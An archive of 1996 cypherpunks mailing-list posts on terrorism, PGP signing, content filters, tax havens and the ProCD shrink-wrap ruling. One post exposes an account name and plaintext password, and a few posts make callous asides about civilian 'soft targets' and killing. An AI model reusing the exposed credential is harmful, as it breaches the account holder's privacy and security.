Date: Sat, 6 Jul 1996 08:19:16 +0800
To: cypherpunks@toad.com
Subject: RE: Net and Terrorism
In-Reply-To: <199607051432.HAA25401@well.com>
Message-ID: <4kuLqD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


talon57@well.com writes:

> 
> 
> Tim May wrote:
> 
> >Again, the Sarin attack in Tokyo had nothing to do with former
> >U.S.S.R. CBW weapons. Chemical and biological agents are cheap to
> >make, especially in the quanties needed to kill only a few
> >thousand people, and in the non-battlefield delivery environment.
> 
> Actually Tim, the Aum Supreme truth cult was using a Russian
> formula for it's production of sarin, and was spending vast amounts
> of time and money trying to obtain Russian NBC expertise. They
> supposedly had an estimated 30,000 followers in the former Soviet
> union.
> 
> I recently finished an excellent book "The cult at the end of the
> world" about all this and highly recommend it to my fellow
> cypherpunks.
> 
> Brian
> 
> 


I used to do work for the company that distributed AUM literature in Russia.
Curiously, the same people distribute Baha'i literature. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 6 Jul 1996 06:05:27 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Moviepunks [NOISE]
Message-ID: <199607051823.OAA08772@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Didn't see either of those flicks, but saw "The Cable Guy" a week 
ago. Actually has more 'net relevance, even though no one there uses 
the 'net.  If you imagine the utopian 'everything delivered by cable' 
(phone, TV, 'net, video games, shopping, etc.) and mix with the power 
a psychotic and corrupt cable installer has, the plot has potential. 
(It's actualisation was something else, though.)

The movie is apparently such a flop that it turned out the group of 
friends I was with were the only people who wanted to see it that 
day, so we had the theatre all to ourselves.  A rare opportunity 
indeed... I only with the movie was worse than it actually was so we 
could have made it into a kind of MST3K thing... but it actually held 
our interest.

Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 6 Jul 1996 06:15:22 +0800
To: cypherpunks@toad.com
Subject: Shrink-Wrap Lic. uphelo by courts.  From Edupage, 4 July 1996
Message-ID: <199607051823.OAA08769@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
Date:          Thu, 4 Jul 1996 17:27:43 -0400 (EDT)
From:          Edupage Editors <educom@elanor.oit.unc.edu>
Subject:       Edupage, 4 July 1996

*****************************************************************
Edupage, 4 July 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities 
seeking to transform education through the use of information technology.
*****************************************************************
[..]

"SHRINK-WRAP" LICENSES OKAYED BY COURT
The validity of the "shrink-wrap" licenses that many software publishers
rely on for copyright protection was bolstered by a recent appellate court
ruling in Chicago.  Last month, the Seventh Circuit Court of Appeals
reversed a lower court's finding that shrink-wrap agreements were
unenforceable.  Plaintiffs in the case, ProCD vs. Zeidenberg et al., charged
the defendants with distributing the software program via the Internet.  The
defendants had argued that they couldn't be held to the license terms
because they'd had no chance to negotiate or object to parts of the
agreement.  They also said the license agreement should be printed on the
outside of the box, where it could be read before purchasing.  The latest
ruling found this suggestion to be an onerous burden, but did say the box
must have a notice saying there's a licensing agreement inside, and that
buyers should be able to return the software if they don't agree to the
license once they read it.  (Investor's Business Daily 3 Jul 96 A5)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 6 Jul 1996 08:50:48 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Net and Terrorism.
In-Reply-To: <199607051652.JAA15062@mail.pacifier.com>
Message-ID: <Pine.GUL.3.94.960705141231.20370B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 5 Jul 1996, jim bell wrote:

> If anything, I think the public would be far better off if there was a 
> mechanism to allow even these "terrorists" to speak directly to the public, 
> without censorship by the governments or heightened risk of capture.

Er, they have that. It's just that most people don't give a shit for their
kind of nonsense, so they don't listen, so the kooks turn to bombings as PR
stunts. Nobody would have read the UnaSpew if Uncle Ted hadn't bombed a few
people. Nobody is going to listen to Jim Bell until you claim credit for
killing some people.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 6 Jul 1996 08:46:53 +0800
To: cypherpunks@toad.com
Subject: Re: Noise: Re: Those Evil Republicans
Message-ID: <2.2.32.19960705212051.0076d260@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 04:05 PM 7/5/96 -0400, hallam@Etna.ai.mit.edu wrote:

>A parasite is omething that lives off a host to its 
>detriment. It is easy for a small island nation to be 
>parasitic off larger ones...In short someone, somewhere
>has to do some work.

Maybe I missed something here, but only small nations that
are on the dole (i.e., foreign aid) can be said to be
parasitic, and even they may be giving something in return
(e.g., land concessions for military bases).  

The service industries in these little countries--banking
tourism, etc.--are free traders giving value for value.
This is not parasitism by any stretch of the imagination.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jul 1996 06:26:28 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: I confess [Was: Who was that Masked Cypherpunk?]
Message-ID: <2.2.32.19960705182536.008209bc@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 PM 7/5/96 -0400, Jim Ray wrote:

>'Twas me, the guardian of the *original* definition of the fine old
>term "escrow" against the slick denizens of Newspeak. I have found
>this Libertarian convention to be a super-fun experience, and I will
>be demonstrating PGP, Private Idaho, and lots of other fun stuff on
>Saturday at 3PM. All are invited to attend.

Since no one has mentioned exactly what happened at the LP Convention, I
will relate it from memory and JR can correct me.

They were going to vote on adopting a platform plank that upheld the right
of everybody to use any crypto they wanted and export it an everything and
also opposing the proposal for a requirement that people use a key escrow
system set up by the government.

JR offered an amendment which changed the language to refer to "so-called
Key Escrow (actually government access to keys GAK)"  and he also explained
that "escrow" is where you place something with a trusted third party and
the government is neither trusted nor a third party.  He mentioned
cypherpunks live on CSPAN.

Maybe when JR finished the Con he can post the original proposed language of
the LPs plank and the final language as amended.

DCF

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 6 Jul 1996 06:25:58 +0800
To: Clay Olbon II <Clay.Olbon@dynetics.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <AE02CA43-160FAC@193.239.225.200>
Message-ID: <Pine.LNX.3.94.960705142635.1291A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 5 Jul 1996, Clay Olbon II wrote:

> Mark M. <markm@voicenet.com> wrote:
> 
> >I didn't say that binaries couldn't be signed.  I said they couldn't be
> >*clear*-signed.  There is a difference between clearsigning and creating a
> >signature certificate that is either concatenated with the data or written
> >to a separate file.  If somebody who doesn't have PGP gets a file that is
> >signed by PGP, the file is completely useless to that person.
> >
> 
> My mistake.  I guess I still don't understand your point however.  Of what
> use is a signature on a file to someone who cannot check its validity?   It
> seems to me that a separate signature file for a binary would serve the
> same purpose ("gee, it LOOKS like somebody signed it").

A signature is of absolutely no use to someone who doesn't have PGP.  However,
somebody who doesn't have PGP can still read this message I am writting right
now.  That is why clear-signing is a Good Thing.  You are correct that a
separate signature file for a binary is just about the same as a clear-signed
message.(In fact they are the same thing.  The only difference is that a
signature of text that is going to be clear-signed is calculated over the text
with CRLF's and dashes and "From_"'s escaped out.  The "PGP SIGNATURE" part is
exactly the same as a seperate signature's "PGP MESSAGE".)

OK, now the point of this message: somebody pointed out that if a binary was
clear-signed using an option that would strip it down to 7 bits, the binary
would be corrupted and therefore, such an option on PGP would be a Bad Thing.
Then, I pointed out that not only would there be no point in a clear signature,
since that would make the binary useless to someone without PGP anyway.  It
is best to sign a binary and extract the certificate to a separate file, which
you noted above.  So an option that would strip data down to 7 bits would not
affect the ability to sign a binary.  Such an option would probably be a Good
Thing.

All this is giving me a severe headache.  Please excuse any run-on sentences.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMd1hMLZc+sv5siulAQHChQP/faS+DKcGht/SxCB+N0UlunSGcAcgUGaw
hX/3qB4pzqwBfCoT6GsMdiQ+wJsSBs7cYm3NMEcPQHNj08cc8Vt5G7lmegjKdhcM
hZBbpscafAnXf/+OcXp8KUIUbGWxEviyKfSskKoQC2IU9m607TRxMG45QHQr59Fc
MEweGyt4Jsk=
=TvfP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 6 Jul 1996 09:28:38 +0800
To: "'cypherpunks@toad.com>
Subject: RE: The Net and Terrorism
Message-ID: <01BB6A82.856C9880@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Timothy C. May

If there's any meta-point I'm making is that people are best served by
making their own security arrangements, be it home protection, financial
security, health security, or the security from rioters, criminals, and
terrorists being talked about here. Turning over increased powers to a
government to do these things is a recipe for failure, at very high costs
(economic and civil liberties costs).
......................................................................


This is what I also understood Tim's point to be.

As long as transforming the whole world into a "kinder, gentler", safer, mix of countries, economies, politics, races, religions, recipes for living, etc., is but a remote possibility in a far-off future galaxy, 

and knowing that governments are typically unprepared to deal with the dangerous states of mind incited by their very own policies,

then (as always) it is wise and adviseable that a person take up some responsibility for preparing themselves, mentally and otherwise, for dealing with  threats of terrorism, the kind of which we are all aware of by now.

This is not fatalism; it is facing the facts.    

     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 6 Jul 1996 07:05:32 +0800
To: Mark Rogaski <wendigo@gti.net>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <199607051544.LAA20442@apollo.gti.net>
Message-ID: <Pine.LNX.3.94.960705151747.1365A-100000@gak>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713590.multipart/signed"

--Boundary..3943.1071713590.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Fri, 5 Jul 1996, Mark Rogaski wrote:

> An entity claiming to be David Rosoff wrote:
> :
> : >	That "creative child" would have to be pretty damn smart to do
> : >what you described.
> :
> : It would actually take less creativity to do the other things, bypass the
> : config.sys, etc. The child would thus be perhaps a little TOO creative. :)
> :
> 
> 2 short replies in one post:
> 
> A)  Who said anything about a creative child?  How about a creative
>     c'punk?

I'm not following you.  I don't think many people on this list are faced with
the problem of getting around software used to filter out pornography, drug
info, and other evil things tearing at the moral fiber of today's youth.
(Hint: I write this with tongue firmly in cheek.)

> 
> B)  Forget the CONFIG.SYS ... what about kids using Macs or some future
>     "Kid Safe" system that has the filters in an eeprom?  I'm talking
>     about bypassing the censorship on the client-server level.  Relatively
>     platform independent.

Using a hardware based filter is about as bad as using the IP security header
fields for content descriptions.  It's not at the level where filtering
belongs.  Filtering should be at the software level where it currently is.
Since this can easily be broken, it might be better to have "Kid Safe" ISP's
that would use a firewall to filter data.

-- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_



--Boundary..3943.1071713590.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zCgpp
UUNWQXdVQk1kMXNyTFpjK3N2NXNpdWxBUUdhK3dQL1N6TnQyTkpOVndteHdx
enJyb0ZMOUZFYnpXWEYzSFpNCi9TMHFhZmFZdjBwV2NqNnZVcmEwczN5MjV0
Qkg2bFM3TkhuMWJRL1VENFRuMzd2L2NKenh4MFBSclBhc3RqaWQKRVUrN0tG
VTErUi9yRFV3MFJRbW5DclFNTmtGYktublVRMWZiT0pzV0pSbmpOZ3k3V3ZZ
YzhHamZDNGdpdW9xNwp4RllqelJJcENPQT0KPVd2WWgKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3943.1071713590.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 6 Jul 1996 08:05:24 +0800
To: Gary Howland <cypherpunks@toad.com
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <31DBA835.6EEA4806@systemics.com>
Message-ID: <9607052005.AA05904@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>First of all, "parasitic" is a very derogatory term to apply to these
>nations.  They are no more parasitic than out of town supermarkets.

A parasite is omething that lives off a host to its detriment. It is
easy for a small island nation to be parasitic off larger ones. The
problem for the USA, UK, Germany etc is that there are no larger 
nations for them to be parasites of, nor are their native peoples to 
steal land from or colonies to exploit. In short someone, somewhere
has to do some work.

>Second, you suggest Liechenstein as a useful model for a modern
>industrial society that has no control over its currency, but then go
>on to criticise Andorra as a useful model.  Why?

Actually I discounted both as models. I don't consider the ecconomy of 
a country of less than a million to be particularly informative in 
considering the ecconomies of countries of fifty or a thousand times that
number for the reasons advanced above.

>Third, you have missed the point I was making, that of Goodhearts law,
>which loosely states that "attempts by the government to regulate or
>tax one channel of banking business quickly lead to the same business
>being conducted through a different channel which is untaxed or
>unregulated".  Surely the fact that every large nation has its
>banking tax havens (eg. UK has the Channel Islands, the US has the
>Caribbean islands) is proof of this?

I'm very skeptical about any idea that is referred to as a "law". The
experience of science is that natural laws are no more constant than
human ones. In the social sciences such terms tend to indicate no more
than the existence of physics envy.

The greatest danger is when the title "law" causes the importance of
an effect to be mistaken. Just because an effect can be observed and 
explained does not mean that it is the only effect. To call something
a "law" is almost guaranteed to lead to biased analysis. 

Goodhearts theorem is overbroad as stated. The banking industry will 
clearly attempt to move to the most beneficial channels. That does
not necessarily mean unregulated. A banker's main product is trust.
The fact that a bank is regulated by government increases consumer
confidence and trust. If I place my money in Midland bank UK I know
that those deposits are guaranteed by the government of the UK. Even
if the bank itself becomes illiquid I can recover my money. The cost
of this security is regulation which I am as a customer happy to take
the benefit of.

The fact that a proportion of money is diverted through tax havens
does not imply that all money will be so diverted. The major banking
centers of the world continue to be London, Geneva, New York and 
Tokyo, all of which are heavilly regulated.

The final factor you exclude is that of ecconomic imperialism. Small
countries don't have unlimited opportunities to exercise their
sovereignty as the govt. of Panama discovered. While a country has
the theoretical right to become a drug trafficing haven it faces the
risk of sanctions ranging from ecconomic pressure to invasion and 
occupation. Similarly the Swiss govt no longer offers the same
anonymity it once did.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Sat, 6 Jul 1996 08:12:34 +0800
To: Greg Miller <gregmi@galileo.mis.net>
Subject: Re: Word lists for passphrases
In-Reply-To: <31dbf02b.66263803@pop.mis.net>
Message-ID: <Pine.GSO.3.94.960705161336.3192A-100000@Ocean.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jul 1996, Greg Miller wrote: 

> 	Are there any publically available word lists which contain just
> about every word in the English language?  It's not absolutley
> necessary, but I'd also like the list to include english names. 

	You can find a list of reliable (sic) FTP and WWW sites in the
alt.2600 FAQ beta version 0.13. That in itself is available at my FTP site
ftp.cam.org /users/cyberia. The English language is 450,000 words in its
entirety, not including (I believe) proper names. So the file you're
looking for (if it exists) would be very large. Good luck.

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Sat, 6 Jul 1996 01:51:05 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <19960705135901328.AAB217@[194.90.26.119]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: bshantz@nwlink.com, markm@voicenet.com, cypherpunks@toad.com
Date: Fri Jul 05 17:10:11 1996
On 7/3 Brad Shantz Wrote:
  
> Once upon a time last year or the year before, Tim May posted why he
> doesn't use PGP very often.  And I have always stood by that same 
> sentiment.  Yes, it is a good encryption product, but it is not 
> integrated seamlessly into other applications.  Tim, feel free to 
> whack me if you think I'm speaking for you.  If, as cypherpunks, we
> want to spread the use of strong crypto, we need to have a better 
> interface than what currently exists on PGP 2.6.2.  

I strongly urge anyone who uses PGP on a regular basis to take a look 
at Pronto Secure. 

It is a fully featured Windows e-mail client with complete & seamless 
PGP integration in its native implementation. Security features 
include: Single click for encrypt sign or decrypt, on the fly 
authentication, key management, talks to the keyservers, intuitive & 
flexible certification / trust management, automated key exchange 
between Pronto Secure clients & more.

The product is in final beta & this will probably be the last 
opportunity to get a free registered copy. We believe that we have a 
pretty secure e-mail client. However before releasing Pronto Secure to 
a less security aware public, we would like to submit the product for 
additional scrutiny by the members of this list. With this objective in 
mind, we have decided to extend our special offer to beta testers: Any 
tester providing us with feedback on the product will automatically be 
eligible for a free copy of the soon to be released Pronto Secure 1.0.

For a detailed specification see http://www.commtouch.com/s-mail.html
To check out what our existing beta testers have said about Pronto 
Secure: http://www.commtouch.com/testers.htm

To apply for the beta send signed mail to secure@commtouch.com. 
Also please attach your PGP key.

I take this opportunity to thank all members of the list who have up to 
now assisted in beta-testing the product. Your input has helped make 
Pronto Secure into what we believe is a truely usable secure e-mail 
client.



- ---------------------------------------------------------------
Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
My PGP public Key 1814AD45 can be obtained by sending a message
to geoff@commtouch.co.il with "Get Key" as the subject.
- ----------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMd0iTELv5OMYFK1FAQG8dQQAo2pgG+JIyHFLT/g6stvFnb+MAIpr8Ut7
43uPtRP6xSCztG1T48V/a4jIHzCYcXiYOrGdalJSRc+alpndFfehD+Ky+nzAsgKu
WZPISfieWb0wQDUygi1DFkKTddzhjlStAdtwZ0J0E4fHHrZgc3NpzfoRvyVUvdtS
cgmH6neWNjs=
=yUlH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Sat, 6 Jul 1996 02:40:20 +0800
To: cypherpunks@toad.com
Subject: Re: Restrictions on crypto overseas
Message-ID: <9607051504.AA50380@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


> What about other nations that have recently passed restrictions on the use
> of crypto? Other than Russia, which are they? Is there a list anywhere?

http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: coryt@rain.org
Date: Sat, 6 Jul 1996 10:15:44 +0800
Subject: New Member Registration
Message-ID: <199607052258.RAA14283@fs1.houston.sccsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Requested Account Name: whitney
Requested Password: elbows
THIS MEMBER HAS BEEN ADDED TO THE UPDATE LIST





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Jul 1996 04:59:45 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <ae029904010210045d37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:37 PM 7/5/96, Duncan Frissell wrote:

>On the other hand, I'm not sure that Tim's pessimism is warranted.  This
>argument that cities will become completely unlivable and the only way to
>survive is to move out into less populated areas has been going on in the
>libertarian, survivalist, and right-wing-nut communities since the 1960s.
>The magazines Vonulife and Libertarian Connection used to talk a lot about
>the relative merits of Nomadism or Troglodytism, suitcase nukes, and such.
>
>Those who took the advice and moved into caves in 1969 have sure had an
>uncomfortable 30 years.  Mel Tappan (author of Survival Guns) may have died
>from a heart attack which he could have survived had he not moved into the
>boonies.  I note as well that Tim is not all that far away from civilization
>and its discontents.  North Dakota or Labrador would be better choices if
>separation were really desired.

Duncan, I said no such thing. Puh-leeeese. :-}

What I _said_ was that _my_ response to increasing crime, the growing
threat of serious terrorist actions, and the generally ratcage-like nature
of large urban areas has been to move away from such urban centers.

(Not that towns like Santa Cruz are crime-free. But they are not prime
targets, when more tempting, fatter, softer targets are so nearby.)

I've never said cities are "completely unlivable," just that, for me,
better options exist. And in the vein of Harry Browne's "How I Found
Freedom in an Unfree World," I think a better response to terrorist actions
is not to crack down further on civil liberties, but to decentralize.
Personally, if not nationally. A variant which might be called "How I Found
Security in an Insecure World."


>And back to Tim:
>
>>(And my point about moving out of cities referred to what *I* am doing;
>>others are of course free to mingle in crowded markets, hoping that the
>>bombs won't come that day. Others are free to send their children to day
>>care centers located in likely targets for ZOG's enemies to bomb, and so
>>on.)

Well, there it is. You quote my clarification to Detweiler's
mischaracterizations. I'm not saying that cities are unlivable for all,
just that concentratios draw attackers of various sorts, and I expect such
attacks to increase in the future.

And small cities are not unlivable, either. Last night, for example, I
celebrated the Fourth at a free Beach Boardwalk concert with the Drifters.
Fine music, resonating even in the Rap Generation's skulls, judging by the
wild reaction from tens of thousands of folks crowded on the beach...

(Now _that_ was a "soft target," in which a lobbed grenade could've taken
out 20 or 40 people....Lots of such soft targets, and little that even a
police state can do to stop it. Personal avoidance, by whatever measures
one deems important, are the best bet.)

If there's any meta-point I'm making is that people are best served by
making their own security arrangements, be it home protection, financial
security, health security, or the security from rioters, criminals, and
terrorists being talked about here. Turning over increased powers to a
government to do these things is a recipe for failure, at very high costs
(economic and civil liberties costs).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 6 Jul 1996 06:45:21 +0800
To: CyberEyes <cyberia@cam.org>
Subject: Re: Net and Terrorism
Message-ID: <199607051834.LAA13579@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: CyberEyes <cyberia@cam.org>
              Cypherpunks <cypherpunks@toad.com>

CyberEyes <cyberia@cam.org> pontificated at 07/05/96 12:29pm -0400

= On Thu, 4 Jul 1996, attila wrote: 
= 
= > "denied zones" (we were never there) is no longer in vogue.  however, we
= > will probably see that again in parts of the world as many cultures do
= > not have the basic respect for life we do.  
= 
= 	What is your last comment supposed to mean exactly? Just because
= some Islamic militants decide to kill a few people in a terrorist attack
= does not mean that the entire believer population of Islam does not have
= respect for life. Just who is "we"? Americans? Europeans? All
= industrialized nations? Every country except those Third World ones? Uh...
= I don't see your point very clearly here... The only culture I can think
= of that might now have respect for life are cannibals, and they DO have
= respect for life in a way, they don't kill each other (I don't think), and
= they do it because it's their lifestyle, but they don't perform
= cannibalistic acts out of malice. Correct me here if I'm wrong.
= 

	let me phrase it another way: there are circumstances where the lives 
    of 'n' innocent people are of less consequence than the enemy --in other 
    words, try to keep collateral damage to a minimum, but get the target 
    before he executes more harm (this applies to hostage situations, as well)

	in general, this does not mean wipe out an entire 100 story building to 
    find a single sniper, but sometimes a commander is faced with the choice: 
    send a team in with a 10% chance of accomplishing the mission (i.e. the 
    team is killed or the target escapes) or waste the village.

	until you have experience the death of men in combat, you will never 
    understand this principle. I certainly did not, and even as a graduate of 
    Harvard and an active member of the LDS Church, I found it only takes once 
    to _clearly_ understand that it is 'to kill or be killed.'

	don't sit in your ivory tower and pontificate until you walk the mile 
    in my shoes.  I also had the responsibility for as many as 1600 additional
    'black shirts' in a fire zone  --think about it.

	oh, sure, I (or anyone else) will never convince you --but maybe you 
    will think about it.

	war is hell, son; and war zones are somewhere beyond.  if you go, just 
    pray that you come back understanding that and not with scrambled eggs for 
    brains. 

		-attila

--
  "Don't hunt wild game, hunt lawyers!
    They provide better sport,
      suffer from severe overpopulation;
        and, they taste just like chicken!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian LaMacchia <bal@peradam.cs.colorado.edu>
Date: Sat, 6 Jul 1996 11:53:28 +0800
To: hallam@ai.mit.edu
Subject: Re: Shrink-Wrap Lic. uphelo by courts.  From Edupage, 4 July 1996
In-Reply-To: <31DDAECD.41C6@ai.mit.edu>
Message-ID: <199607060042.RAA00849@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 05 Jul 1996 20:09:49 -0400
   From: Hallam-Baker <hallam@ai.mit.edu>
   X-Mailer: Mozilla 2.01 (X11; I; OSF1 V3.2 alpha)
   Mime-Version: 1.0
   References: <4rk4j2$qdr@life.ai.mit.edu>
   Content-Type: text/plain; charset=us-ascii
   Content-Transfer-Encoding: 7bit
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   Deranged Mutant wrote:
   > 
   >The latest
   > ruling found this suggestion to be an onerous burden, but did say the box
   > must have a notice saying there's a licensing agreement inside, and that
   > buyers should be able to return the software if they don't agree to the
   > license once they read it.  (Investor's Business Daily 3 Jul 96 A5)

   Perhaps Prof Froomkin could provide an opinion. It sounds to me however
   as if the defendants were simply ripping off the copyright of the plaintif
   and attempting to get arround it by claiming to have "bought" rights to
   resell along with the software by wrangling over the shrink wrap agreement.

Actually, defendant was exercising his right to copy uncopyrightable
material as per _Feist_.  Plaintiff sued, claiming inter alia that the
shrinkwrap license on the box prohibited the defendant from such
copying.  (I'm simplifying here; read the cases for the gory details.)
The case is ProCD v. Zeidenberg.  The district court decision (ruling in
favor of Zeidenberg) may be found at 908 F.Supp. 640.  The ruling of the
7th Circuit Court of Appeals (in favor of ProCD) may be found at 1996
U.S. App. LEXIS 14951.

What was at issue, if I recall correctly, was telephone book data for
six states surrounding Wisconsin.  ProCD took the phone books for that
area, copied the data (name, address, phone numbers) out of them and
published CD-ROMs with the resulting database.  Zeidenberg purchased
copies of the ProCD CD-ROMs, along with similar CDs from other
publishers, and put the intersection of the data up on the Web for
free.  

Now, neither ProCD nor Zeidenberg needed permission of the previous
publisher of the data, *from the perspective of copyright*, in order to
reuse it.  This is because the Supreme Court ruled in Feist
Publications, Inc. v. Rural Telephone Service Co., 499 U.S. 340,113
L. Ed. 2d 358, 111 S. Ct. 1282 (1991), that telephone book listings
lacked the originality required to qualify as copyrightable subject
matter under 17 USC 102.  So ProCD couldn't claim copyright infringement
because their *data* was uncopyrightable.  (ProCD also had some
searching software on the CD, but that software wasn't copied or
distributed by Zeidenberg and thus there were no copyright infringement
issues.)  They thus resorted to claims based on the shrink-wrap license
on the box.

   I suspect that the claims the plaintifs were making lay very definitely
   within the range of what people in the trade would usually expect to be
   the licensing terms for software purchased off the shelf. Just as there 
   is an expectation when purchasing a book that one has purchased an instance
   and not the rights to the copyright. Consider the analogy with purchasing a
   book that is wrapped in shrink wrap film and that consequently one was
   unable to read the "all rights reserved" legend.

When I purchase a copy of a book in the bookstore, I gain rights to that
particular copy.  This is what's known as "first sale doctrine."  No, I
can't make copies of my copy, and I can't distribute my copy to the
public, but I can resell my copy.  Furthermore, if the copy of the book
I purchase contains uncopyrightable material, I can do what I want with
that material (again, from a copyright point of view).  When I buy
software off-the-shelf, I gain certain rights to that copy of the
software, including the right to make copies for archival purposes (17
USC 117).  

What concerns me about the 7th Circuit's decision is that they appear to
be giving publishers a way to "extent" copyright protection to
